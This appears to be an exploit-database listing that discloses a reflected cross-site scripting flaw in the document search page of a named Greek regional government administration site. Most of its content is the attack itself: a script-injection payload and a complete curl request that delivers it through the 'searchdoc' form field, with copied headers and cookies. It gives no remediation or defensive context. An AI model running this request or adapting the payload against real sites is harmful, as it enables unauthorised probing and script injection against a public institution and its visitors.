Greece Decentralized Administration Of MACEDONIA-THRACE XSS Injection

2020.09.02
tr God3err (TR) tr
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Exploit Title : Greece Decentralized Administration Of MACEDONIA-THRACE XSS Injection Exploit Type : Reflected Cross Site Scripting Exploit Date 02-09-2020 Exploit Link : http://docman.damt.gov.gr/docman.php Exploit : "><script>alert(0);</script> curl 'http://docman.damt.gov.gr/docman.php' \ -H 'Connection: keep-alive' \ -H 'Cache-Control: max-age=0' \ -H 'Upgrade-Insecure-Requests: 1' \ -H 'Origin: http://docman.damt.gov.gr' \ -H 'Content-Type: application/x-www-form-urlencoded' \ -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Edg/85.0.564.44' \ -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \ -H 'Referer: http://docman.damt.gov.gr/docman.php' \ -H 'Accept-Language: tr,en;q=0.9,en-GB;q=0.8,en-US;q=0.7' \ -H 'Cookie: __utmz=230322057.1597781496.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=230322057.784426167.1597781496.1597862443.1598304986.3; __utma=133562651.2033764111.1598305060.1598305060.1598305060.1; __utmz=133562651.1598305060.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)' \ --data-raw 'searchdoc=<b>%22%3E%3Cscript%3Ealert%280%29%3B%3C%2Fscript%3E</b>&searchproto=&anazitisi.x=49&anazitisi.y=11' \ --compressed \ --insecure


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top